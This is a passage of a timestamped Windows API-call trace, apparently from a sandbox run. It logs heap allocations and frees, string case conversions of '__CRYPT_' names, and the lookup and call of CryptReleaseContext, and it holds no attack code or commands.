[0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd840 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd750 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.534] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0167.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0167.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0167.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0167.536] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0167.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0167.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0167.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.537] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.538] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.538] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0167.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x90d440, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.539] GetProcAddress (hModule=0x74f20000, lpProcName="CryptReleaseContext") returned 0x74f2e124 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0167.539] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0167.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0167.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 